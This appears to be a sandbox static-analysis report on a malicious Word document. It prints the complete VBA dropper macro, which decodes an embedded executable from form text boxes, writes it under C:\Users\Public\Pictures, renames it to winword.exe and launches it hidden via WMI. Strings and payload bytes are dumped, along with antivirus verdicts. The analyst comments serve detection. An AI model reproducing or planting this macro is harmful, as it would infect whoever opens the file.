Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
' Analyst summary: auto-run entry point of a dropper macro. Document_Open is
' the Word event procedure that runs when the document is opened with macros
' enabled. The routine rebuilds a byte array from "!"-separated decimal text
' stored in UserForm1's text boxes, writes it to disk via SaveBinaryData,
' renames the file, and starts it through WMI with a hidden-window setting.
' No path, ProgID or WMI class name is a literal in this module; each is read
' from a UserForm2 text box at run time, so reviewing the module text alone
' does not reveal them. The strings dump further down this report lists what
' appear to be those values (to be confirmed against the form streams).

' Hides the Word application window before any further work is done.
Documents.Application.Visible = False

' Randomised identifiers: a String() for the split tokens and a Byte() for
' the decoded payload.
Dim askfjlskdjflkjsdrkljskd() As String
Dim alksdjweoijgskljsl_____() As Byte
' Concatenates UserForm1.TextBox1..TextBox4 and splits on "!". The decimal
' stream shown in the strings dump begins 77!90!144 (77, 90 = ASCII "MZ") and
' later contains 80!69!0!0 ("PE" plus two NULs), which is consistent with a
' Windows PE image stored as text.
askfjlskdjflkjsdrkljskd = Split(UserForm1.TextBox1.Text & UserForm1.TextBox2.Text & UserForm1.TextBox3.Text & UserForm1.TextBox4.Text, "!")
' Running index into the byte array (declared Double, used as an array bound).
Dim lskjfjiogjnvdfgljwlfjfsf As Double
lskjfjiogjnvdfgljwlfjfsf = 0
' One token per output byte; the array is grown by one element per iteration.
For Each tiogjvelrrkjf In askfjlskdjflkjsdrkljskd
        ReDim Preserve alksdjweoijgskljsl_____(lskjfjiogjnvdfgljwlfjfsf)
        alksdjweoijgskljsl_____(lskjfjiogjnvdfgljwlfjfsf) = CByte(tiogjvelrrkjf)
        lskjfjiogjnvdfgljwlfjfsf = lskjfjiogjnvdfgljwlfjfsf + 1
Next
' Writes the decoded bytes to the path held in UserForm2.TextBox1. The strings
' dump shows C:\Users\Public\Pictures\winword.con, presumably this value.
SaveBinaryData UserForm2.TextBox1.Text, alksdjweoijgskljsl_____
Dim woituklkreltjlsjldkfjsldkjftoiu
' Late-bound COM object whose ProgID comes from UserForm2.TextBox3; the
' MoveFile call below and the "Scripting.FileSystemObject" entry in the
' strings dump suggest a FileSystemObject (confirm).
Set woituklkreltjlsjldkfjsldkjftoiu = CreateObject(UserForm2.TextBox3.Text)
' Renames the dropped file from the TextBox1 path to the TextBox2 path. The
' strings dump shows C:\Users\Public\Pictures\winword.exe as the likely
' target, i.e. the file is written under a non-executable extension and only
' then given .exe. Triage note: an Office process creating or renaming a file
' to .exe in a user-writable directory is a useful file-telemetry signal.
woituklkreltjlsjldkfjsldkjftoiu.MoveFile UserForm2.TextBox1.Text, UserForm2.TextBox2.Text
' Value later assigned to the startup object's ShowWindow property; going by
' the constant's name, the new process is meant to have no visible window.
Const HIDDEN_WINDOW = 12
' "." addresses the local machine in the WMI moniker below.
strComputer = "."
' The moniker is assembled from short fragments; concatenated, they read
' winmgmts:{impersonationLevel=impersonate}!\\ followed by strComputer and
' \root\cimv2. Splitting the literal keeps the whole string out of the module
' text, so signatures should match on the fragments or on runtime behaviour.
Set objWMIService = GetObject("wi" + "nm" + "gm" + "ts:{impe" + "rs" + "onati" + "onLeve" + "l=imp" + "erso" + "nate}!\\" & strComputer & "\root\cimv2")
' WMI class name read from UserForm2.TextBox5; the strings dump lists
' Win32_ProcessStartup, which matches the ShowWindow property set below.
Set objStartup = objWMIService.Get(UserForm2.TextBox5.Text)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
' Moniker read from UserForm2.TextBox6; the strings dump lists
' winmgmts:root\cimv2:Win32_Process (presumably this value).
Set objProcess = GetObject(UserForm2.TextBox6.Text)
' Starts the renamed file (UserForm2.TextBox2 path) with the startup object.
' errReturn and intProcessID are never checked afterwards in this routine.
' Triage note: a process started through Win32_Process.Create is typically
' parented by the WMI provider host rather than by WINWORD.EXE, so rules keyed
' only on Office child processes can miss it; WMI activity and file-creation
' telemetry are the more dependable signals. Hardening that targets Office
' writing executable content and WMI-originated process creation applies here.
errReturn = objProcess.create(UserForm2.TextBox2.Text, Null, objConfig, intProcessID)
End Sub
Function SaveBinaryData(FileName, ByteArray)
  ' Writes ByteArray to the file FileName through a late-bound COM stream.
  '   FileName  - destination path; Document_Open passes UserForm2.TextBox1.Text.
  '   ByteArray - the Byte() decoded from the UserForm1 text boxes.
  ' The function name is never assigned, so no meaningful value is returned,
  ' and no On Error handler is present in this function.
  ' The two constants are passed to Type and SaveToFile below; with value 2 the
  ' save mode overwrites an existing file of the same name.
  Const adTypeBinary = 1
  Const adSaveCreateOverWrite = 2
  Dim BinaryStream
  ' ProgID is read from UserForm2.TextBox7 instead of being written as a
  ' literal; the strings dump lists "ADODB.Stream", which matches the
  ' Type/Open/Write/SaveToFile calls used here (confirm against the form).
  Set BinaryStream = CreateObject(UserForm2.TextBox7.Text)
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.Write ByteArray
  ' Triage note: this is the point where the payload reaches disk, so an
  ' Office process writing a file that starts with an MZ header is the event
  ' to look for in endpoint telemetry.
  BinaryStream.SaveToFile FileName, adSaveCreateOverWrite
End Function

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
' Analyst note on this "Deobfuscated" listing: it is identical to the
' "Original" listing of the same module. The identifiers are still randomised
' and the split WMI moniker is not folded, because the obfuscation here is
' indirection through UserForm text boxes rather than encoded literals.
' Behaviour: runs on document open (macros enabled), decodes "!"-separated
' decimal bytes from UserForm1, writes them to disk, renames the file and
' starts it through WMI with a hidden-window setting.

' Hides the Word application window.
Documents.Application.Visible = False

' Token array and decoded byte array.
Dim askfjlskdjflkjsdrkljskd() As String
Dim alksdjweoijgskljsl_____() As Byte
' Payload text = UserForm1.TextBox1..TextBox4 joined, split on "!". In the
' strings dump the stream starts 77!90!144 ("MZ" in ASCII), consistent with a
' PE file carried as decimal text.
askfjlskdjflkjsdrkljskd = Split(UserForm1.TextBox1.Text & UserForm1.TextBox2.Text & UserForm1.TextBox3.Text & UserForm1.TextBox4.Text, "!")
' Array index, incremented once per token.
Dim lskjfjiogjnvdfgljwlfjfsf As Double
lskjfjiogjnvdfgljwlfjfsf = 0
' Converts every decimal token to one byte, growing the array each time.
For Each tiogjvelrrkjf In askfjlskdjflkjsdrkljskd
        ReDim Preserve alksdjweoijgskljsl_____(lskjfjiogjnvdfgljwlfjfsf)
        alksdjweoijgskljsl_____(lskjfjiogjnvdfgljwlfjfsf) = CByte(tiogjvelrrkjf)
        lskjfjiogjnvdfgljwlfjfsf = lskjfjiogjnvdfgljwlfjfsf + 1
Next
' Drop step: destination path comes from UserForm2.TextBox1 (strings dump:
' C:\Users\Public\Pictures\winword.con, presumably this value).
SaveBinaryData UserForm2.TextBox1.Text, alksdjweoijgskljsl_____
Dim woituklkreltjlsjldkfjsldkjftoiu
' ProgID from UserForm2.TextBox3; likely Scripting.FileSystemObject given the
' MoveFile call and the strings dump (confirm).
Set woituklkreltjlsjldkfjsldkjftoiu = CreateObject(UserForm2.TextBox3.Text)
' Rename step: TextBox1 path to TextBox2 path (strings dump:
' C:\Users\Public\Pictures\winword.exe, presumably the target). Both paths
' are useful host indicators when hunting for this sample.
woituklkreltjlsjldkfjsldkjftoiu.MoveFile UserForm2.TextBox1.Text, UserForm2.TextBox2.Text
' Assigned to ShowWindow on the startup object below.
Const HIDDEN_WINDOW = 12
' Local machine.
strComputer = "."
' Fragments concatenate to winmgmts:{impersonationLevel=impersonate}!\\ plus
' strComputer plus \root\cimv2; the literal is split so that the full moniker
' never appears in the module text.
Set objWMIService = GetObject("wi" + "nm" + "gm" + "ts:{impe" + "rs" + "onati" + "onLeve" + "l=imp" + "erso" + "nate}!\\" & strComputer & "\root\cimv2")
' Class name from UserForm2.TextBox5 (strings dump: Win32_ProcessStartup).
Set objStartup = objWMIService.Get(UserForm2.TextBox5.Text)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
' Moniker from UserForm2.TextBox6 (strings dump:
' winmgmts:root\cimv2:Win32_Process, presumably this value).
Set objProcess = GetObject(UserForm2.TextBox6.Text)
' Execution step: starts the file at the TextBox2 path. The return code and
' process id are not inspected afterwards. For detection, correlate WMI
' process creation with the preceding file write by the Office process, since
' the new process is typically not a direct child of WINWORD.EXE.
errReturn = objProcess.create(UserForm2.TextBox2.Text, Null, objConfig, intProcessID)
End Sub
Function SaveBinaryData(FileName, ByteArray)
  ' Helper that persists ByteArray to FileName using a COM stream object.
  '   FileName  - output path supplied by Document_Open.
  '   ByteArray - decoded payload bytes.
  ' Nothing is assigned to the function name and no error handler is present.
  ' Identical to the copy in the "Original" listing of this module.
  Const adTypeBinary = 1
  Const adSaveCreateOverWrite = 2
  Dim BinaryStream
  ' The ProgID is taken from UserForm2.TextBox7; the strings dump shows
  ' "ADODB.Stream" as the likely value (confirm against the form stream).
  Set BinaryStream = CreateObject(UserForm2.TextBox7.Text)
  ' Binary mode, so the bytes are written without text conversion.
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.Write ByteArray
  ' Overwrites any existing file at FileName (save option 2).
  BinaryStream.SaveToFile FileName, adSaveCreateOverWrite
End Function

                                    

Original


                                        Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5B65C132-099A-4D07-8AD5-E8AF1A6543B9}{7369360D-ED7A-4B12-8C65-F03E794A3190}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: both handlers in this form module are empty stubs, so the form
' contributes no executable logic. The form matters as data storage:
' ThisDocument.Document_Open reads UserForm1.TextBox1..TextBox4 and decodes
' their text into the dropped file. Macro scanners that inspect only module
' source will not see that text; the form streams need to be extracted too.
Private Sub TextBox1_Change()

End Sub

' Empty stub, see the note above.
Private Sub TextBox2_Change()

End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5B65C132-099A-4D07-8AD5-E8AF1A6543B9}{7369360D-ED7A-4B12-8C65-F03E794A3190}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: this "Deobfuscated" listing of UserForm1 is the same as the
' "Original" one, two empty Change handlers and no logic. The payload text
' read by ThisDocument.Document_Open lives in this form's TextBox1..TextBox4
' controls, not in the module source.
Private Sub TextBox1_Change()

End Sub

' Empty stub.
Private Sub TextBox2_Change()

End Sub

                                    

Original


                                        Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{693F2F95-F335-4EFF-A200-65A3A493FB51}{42216B07-9C44-4BA7-A6EF-8684F66A93B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: all four handlers in this form module are empty stubs. The
' form acts as a string table for ThisDocument: Document_Open and
' SaveBinaryData read UserForm2.TextBox1, 2, 3, 5, 6 and 7 to obtain file
' paths, COM ProgIDs and WMI names at run time. The strings dump further down
' this report shows the apparent values (two paths under
' C:\Users\Public\Pictures, Scripting.FileSystemObject, Win32_ProcessStartup,
' winmgmts:root\cimv2:Win32_Process, ADODB.Stream). TextBox4 is not
' referenced by the visible macro code.
Private Sub TextBox1_Change()

End Sub

' Empty stub.
Private Sub TextBox2_Change()

End Sub

' Empty stub.
Private Sub TextBox4_Change()

End Sub

' Empty stub.
Private Sub TextBox7_Change()

End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{693F2F95-F335-4EFF-A200-65A3A493FB51}{42216B07-9C44-4BA7-A6EF-8684F66A93B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: identical to the "Original" UserForm2 listing, four empty
' Change handlers. The security-relevant content of this form is the text of
' its controls, which ThisDocument reads in place of hard-coded literals
' (paths, ProgIDs, WMI class and moniker). Extract the form streams when
' building indicators; the module source alone carries none of them.
Private Sub TextBox1_Change()

End Sub

' Empty stub.
Private Sub TextBox2_Change()

End Sub

' Empty stub.
Private Sub TextBox4_Change()

End Sub

' Empty stub.
Private Sub TextBox7_Change()

End Sub

                                    
bjbjb3b3
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
1Ccc!R
pYlnPaoa
ou>U5{
#_Yc9
[Nlm}G
J>bQJq
H|R0em
U*W^e(=
~X[^j
\F{U`iV
evHY~^
|"{X#U
wgiV<
4{9u-A<g
^sWn0
:_n8_-
9VWII+
W1*r>ve7-U<g
T]Y!vw
"e^rjRm
kTtU:P
kHo 2l
Is;KowV
pv:uU;+>
K{8,vx@
exjN1IF
jKy%gm
5-wNH&
9<u*KvWw
!aey}j
Equ*>|
*$1$yNwglJ
-59<Ku
:vIF|2
Vs24q,smwL
k[%k-{
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
PxzSq]y<u
b!e9#i
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Chinto
Normal.dotm
Allen Murphy
Microsoft Office Word
SaveBinaxryD
woituk@lkrelt@
teObjec'L&
veFi@}EQ
HIDDEN_@WINDOW
objWMI Servib
"wi" +P "nm
s:{impeb
\root\ci
xf#5Bn
@!f,igc
I@$ance_
Window
Proces.s
rReturn
Null,
, int
nArray
eOverWri
= @G
_7E#
ts:{impe
onLeve
nate}!\\
\root\cimv2
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Customliz
_Op@en()
.Applica
tion.Vis
kfjlskdj
flkjsdrk
() As$ S
sdjweoijdgs
Ct@(UserF
.TextBox
ogjnvdfg
ljwlfjfs"f
+ Each
velrrkjf
Attribut
e VB_Nam
e = "Use
rForm1"
5B65C132
-099A-4D
07-8AD5-
E8AF1A65
43B9}{73
69360D-E
JB12-8
C65-F03E
794A3190
dGlobal!
Pre decla
plateDer
Custohmiz
Sub Text
Box1_Cha
Attribut
e VB_Nam
e = "Use
rForm2"
693F2F95
-F335-4E
FF-A200-@65A3A4
51}{4221
6B07-9C4
4-4BA7-A
6EF-8684
F66A93B1
dGlobal!
Pre decla
plateDer
Custohmiz
Sub Text
Box1_Cha
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\SysWOW6
e2.tlb
#OLE Aut
omation
ENormal
! Offic
!G{2DF8
D04C-5BF
A-101B-BHDE5
Files (
x86)\Com
rosoft S
hared\OF
FICE16\M
SO.DLL#
P 16.0 O
Libra,ry
zMSBF@Cs>
EE1-E08F
608C4D0B
eFM20L'
BE911453
-AD68-41
99-B4A8-
C2B6FFFD
rs\ALLEN
M~1\AppD
ata\Loca
l\Temp\V
hisDocum@entG
*\CNormalrU
ThisDocument
UserForm1
UserForm2
Project
C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files (x86)\Microsoft Office\root\Office16\MSWORD.OLB
C:\Windows\SysWOW64\stdole2.tlb
stdole
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
C:\Windows\SysWOW64\FM20.DLL
MSForms
C:\Users\ALLENM~1\AppData\Local\Temp\VBE\MSForms.exd
Document
Document_Open
SaveBinaryData
UserForm
F3Dynamic
TextBox1
Win64x
Project-
stdole
Normal
Office
MSFormsC
ThisDocument<
_Evaluate
Document_Open
Documents
Application
Visible
askfjlskdjflkjsdrkljskd
alksdjweoijgskljsl_____.
UserForm1)
TextBox1
TextBox2
TextBox3
TextBox4
lskjfjiogjnvdfgljwlfjfsf
tiogjvelrrkjfCz
SaveBinaryDatah
UserForm2*
woituklkreltjlsjldkfjsldkjftoiu
CreateObject
MoveFilew
HIDDEN_WINDOW
strComputer
objWMIService
GetObjectz
objStartup
TextBox5
objConfigE
SpawnInstance_a
ShowWindowJk
objProcess
TextBox6
errReturn
create
intProcessIDH
FileNamej
ByteArray
adTypeBinary
adSaveCreateOverWrite
BinaryStream
TextBox7
SaveToFile
TextBox1_Change=
TextBox2_Change
TextBox4_Change
TextBox7_Change
Documentj
UserFormN
Change
_B_var_tiogjvelrrkjf
_B_var_strComputerD
_B_var_objWMIService}G
_B_var_objStartup
_B_var_objConfig
_B_var_objProcess
_B_var_intProcessID
_B_var_errReturnF
TextBox2
TextBox3
TextBox4
TextBox1_Change
TextBox2_Change
TextBox7
TextBox5
TextBox6
TextBox4_Change
TextBox7_Change
VBE7.DLL
FileName
ByteArray
Tahoma
TextBox1
TextBox2k
TextBox3
TextBox4k
Microsoft Forms 2.0 Form
Embedded Object
VERSION 5.00
Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm1
Caption = "UserForm1"
ClientHeight = 6480
ClientLeft = 120
ClientTop = 465
ClientWidth = 8880
StartUpPosition = 1 'CenterOw
77!90!144!0!3!0!0!0!4!0!0!0!255!255!0!0!184!0!0!0!0!0!0!0!64!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!128!0!0!0!14!31!186!14!0!180!9!205!33!184!1!76!205!33!84!104!105!115!32!112!114!111!103!114!97!109!32!99!97!110!110!111!116!32!98!101!32!114!117!110!32!105!110!32!68!79!83!32!109!111!100!101!46!13!13!10!36!0!0!0!0!0!0!0!80!69!0!0!76!1!3!0!173!238!72!97!0!0!0!0!0!0!0!0!224!0!46!1!11!1!48!0!0!226!19!0!0!24!5!0!0!0!0!0!14!1!20!0!0!32!0!0!0!32!20!0!0!0!64!0!0!32!0!0!0!2!0!0!4!0!0!0!0!0!0!0!6!0!0!0!0!0!0!0!0!96!25!0!0!2!0!0!0!0!0!0!2!0!96!133!0!0!16!0!0!16!0!0!0!0!16!0!0!16!0!0!0!0!0!0!15!0!0!0!0!0!0!0!0!0!0!0!192!0!20!0!75!0!0!0!0!32!20!0!228!20!5!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!64!25!0!12!0!0!0!127!0!20!0!28!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!32!0!0!8!0!0!0!0!0!0!0!0!0!0!0!8!32!0!0!72!0!0!0!0!0!0!0!0!0!0!0!46!116!101!120!116!0!0!0!20!225!19!0!0!32!0!0!0!226!19!0!0!2!0!0!0!0!0!0!0!0!0!0!0!0!0!0!32!0!0!96!46!114!115!114!99!0!0!0!
Tahoma
110!84!121!112!101!0!73!77!101!116!114!111!67!111!109!112!111!110!101!110!116!0!77!101!116!114!111!70!114!97!109!101!119!111!114!107!46!73!110!116!101!114!102!97!99!101!115!0!77!101!116!114!111!83!116!121!108!101!69!120!116!101!110!100!101!114!0!77!101!116!114!111!70!114!97!109!101!119!111!114!107!46!67!111!109!112!111!110!101!110!116!115!0!67!111!109!112!111!110!101!110!116!0!83!121!115!116!101!109!46!67!111!109!112!111!110!101!110!116!77!111!100!101!108!0!77!101!116!114!111!83!116!121!108!101!77!97!110!97!103!101!114!0!77!101!116!114!111!84!111!111!108!84!105!112!0!84!111!111!108!84!105!112!0!83!121!115!116!101!109!46!87!105!110!100!111!119!115!46!70!111!114!109!115!0!73!77!101!116!114!111!67!111!110!116!114!111!108!0!77!101!116!114!111!66!117!116!116!111!110!0!77!101!116!114!111!70!114!97!109!101!119!111!114!107!46!67!111!110!116!114!111!108!115!0!66!117!116!116!111!110!0!77!101!116!114!111!67!104!101!99!107!66!111!120!0!67!104!101!99!107!66!111!120!0!77!101!116!114!111!67!111!109!98!111!66!111!120!0!67!11
Tahoma
215!145!23!77!76!122!38!88!230!253!152!7!63!9!104!233!225!138!208!238!249!182!255!42!193!116!75!225!156!11!4!183!231!202!55!6!175!40!115!239!96!248!73!168!247!99!50!103!253!230!139!227!22!89!15!161!5!9!200!12!128!192!226!121!73!76!49!189!114!33!7!67!47!19!14!215!229!205!221!218!142!251!220!70!12!7!46!226!159!170!170!107!177!6!70!162!219!38!228!87!226!140!127!112!234!220!17!38!100!136!32!9!209!36!101!112!140!171!193!179!29!164!65!94!192!63!25!186!94!115!209!158!100!4!63!3!90!175!132!232!20!187!119!135!227!188!31!16!23!40!62!189!0!95!142!128!172!117!156!160!146!139!3!98!142!253!140!172!145!50!18!55!195!66!67!132!77!246!115!8!69!212!128!221!245!161!147!107!4!126!234!128!15!12!98!166!105!158!214!191!171!21!164!38!153!13!122!179!23!244!115!9!62!14!246!52!51!5!39!11!150!214!130!139!35!29!117!111!169!9!129!151!224!89!145!181!151!205!41!34!83!182!106!173!91!195!160!87!161!180!161!238!219!106!106!49!195!51!91!176!115!96!110!22!35!183!120!203!139!35!126!137!169!146!224!77!66!32!173!38!85!91!249!104!214!53!36!158!236!19
Tahoma
20!163!163!232!71!161!103!90!143!154!72!231!144!84!104!72!25!253!146!69!107!219!79!95!58!0!50!151!243!179!5!239!148!181!217!165!79!99!95!212!174!194!65!186!197!58!175!54!50!80!86!14!123!175!184!194!33!158!199!234!22!163!199!35!13!19!37!1!54!174!182!71!33!178!4!112!152!152!38!115!3!45!27!102!220!240!125!51!150!21!91!224!162!99!115!155!83!31!193!240!18!47!2!174!133!35!246!4!193!105!23!92!3!103!60!18!27!106!191!88!60!22!250!203!80!219!207!51!125!97!186!29!106!183!40!26!96!192!93!46!159!120!117!56!211!25!150!132!213!27!192!73!64!159!215!219!130!11!201!165!58!164!146!112!53!113!81!238!146!107!89!173!107!167!175!171!34!20!225!238!132!49!111!190!1!121!157!135!138!133!93!1!170!69!213!104!89!24!17!187!73!50!1!6!231!32!14!125!76!175!138!51!120!65!25!217!103!50!169!226!14!5!48!194!143!235!213!242!210!106!33!10!240!0!17!53!71!27!50!36!229!187!65!162!21!7!74!196!110!33!113!128!165!86!150!213!224!236!109!251!188!199!67!150!60!138!39!254!21!100!43!119!18!134!96!89!151!226!216!228!119!108!150!152!47!11!149!109!8!205!119!30!1
Tahoma
TypeInfoVer = 4
Tahoma
TextBox1
C:\Users\Public\Pictures\winword.con
Tahoma
C:\Users\Public\Pictures\winword.exe
Tahomae
Scripting.FileSystemObject
Tahoma
winmgmts:{impersonationLo
evel=impersonate}!\\" & strComputer & "\root\cimv2}
Tahoma
Win32_ProcessStartup
Tahoma
winmgmts:root\cimv2:Win32_Process
Tahoma
ADODB.Stream
Tahoma
TextBox2
TextBox3
TextBox4
TextBox5
TextBox6
TextBox7
Microsoft Forms 2.0 Form
Embedded Object
VERSION 5.00
Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm2
Caption = "UserForm2"
ClientHeight = 5535
ClientLeft = 120
ClientTop = 465
ClientWidth = 7920
StartUpPosition = 1 'CenterOwner
TypeInfoVer = 7
ThisDocument
UserForm1
UserForm2
ID="{00000000-0000-0000-0000-000000000000}"
Document=ThisDocument/&H00000000
Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}
BaseClass=UserForm1
BaseClass=UserForm2
HelpFile=""
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="F4F65810B8C6BCC6BCC2C0C2C0"
DPB="A6A40AE20E26DD43DD4322BDDE43A70P
7ED54E5E7EBD176C1601D2FF24E97ED9DABF0C1BA4A3F6D"
GC="585AF407F507F507"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
UserForm1=0, 0, 0, 0, C, 26, 26, 1154, 503, C
UserForm2=104, 104, 1072, 556, C, 52, 52, 1180, 529,
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Untitled
Normal
Default Paragraph Font
Table Normal
No List
Unknown
Times New Roman
Symbol
Calibri
Calibri Light
Cambria Math
Chinto
Allen Murphy
Root Entry
1Table
WordDocument
SummaryInformation
DocumentSummaryInformation
Macros
ThisDocument
__SRP_2
__SRP_3
UserForm1
sDocument
*\R0*#17
.\..\..\..\..\
0{5B65C132-099A-4D07-8AD5-E8AF1A6543B9}{7369360D-ED7A-4B12-8C65-F03E794A3190}
(1Normal.ThisDocument
$*\Rffff*0663403092
*\R0*#17
$*\Rffff*0<63403093
*\R0*#f
*\G{AC2DE821-36A2-11CF-8053-00AA006009FA}#2.0#0#..\..\..\..\..\..\Windows\SysWOW64\FM20.DLL\2#Microsoft Forms 2.0 Object Library*#44
$*\Rffff*0;63403093
*\R1*#c0
*\R1*#c5
*\R1*#c1
*\R1*#17b
$*\Rffff*0;63403093
__SRP_4
__SRP_5
UserForm2
__SRP_6
0{693F2F95-F335-4EFF-A200-65A3A493FB51}{42216B07-9C44-4BA7-A6EF-8684F66A93B1}
$*\Rffff*0<63403093
__SRP_7
_VBA_PROJECT
__SRP_0
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-B
WOW64\FM20.DLL#Microsoft
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files (x86)\Microsoft Office\root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\SysWOW64\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{BE911453-AD68-4199-B4A8-C2B6FFFD786D}#2.0#0#C:\Users\ALLENM~1\AppData\Local\Temp\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library
ThisDocument
0663403092
ThisDocument
UserForm1
0;63403093
UserForm1
UserForm2
0<63403093
UserForm2
MoveFile
ts:{impe
onLeve
nate}!\\
\root\cimv2
SpawnInstance_
ShowWindow
create
SaveToFilep
__SRP_1
UserForm1
CompObj
VBFrame
UserForm2
CompObj
VBFrame
PROJECTwm
tThisDocument
1UserForm1
2UserForm2
PROJECT
CompObj
Antivirus Signature
Bkav Clean
Lionic Trojan.MSWord.Generic.4!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu VBA.Trojan-Downloader.Agent.bti
Cyren Clean
Symantec Trojan.Gen.2
ESET-NOD32 Clean
TrendMicro-HouseCall TROJ_FRS.VSNTIO21
Avast Clean
Cynet Clean
Kaspersky UDS:Trojan.MSOffice.Alien.gen
BitDefender VB.Heur.EmoDldr.32.CD6503CE.Gen
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan VB.Heur.EmoDldr.32.CD6503CE.Gen
Rising Clean
Ad-Aware VB.Heur.EmoDldr.32.CD6503CE.Gen
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.OLE2.Downloader.tx
FireEye VB.Heur.EmoDldr.32.CD6503CE.Gen
Emsisoft VB.Heur.EmoDldr.32.CD6503CE.Gen (B)
SentinelOne Static AI - Malicious OLE
GData VB.Heur.EmoDldr.32.CD6503CE.Gen
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit HEUR.VBA.CG.2
ViRobot Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Phonzy.C!ml
TACHYON Suspicious/W97M.Obfus.Gen.6
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
ALYac VB.Heur.EmoDldr.32.CD6503CE.Gen
MAX malware (ai score=82)
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Tencent Clean
Yandex Clean
Ikarus Win32.Outbreak
MaxSecure Clean
Fortinet Clean
Panda Clean
No IRMA results available.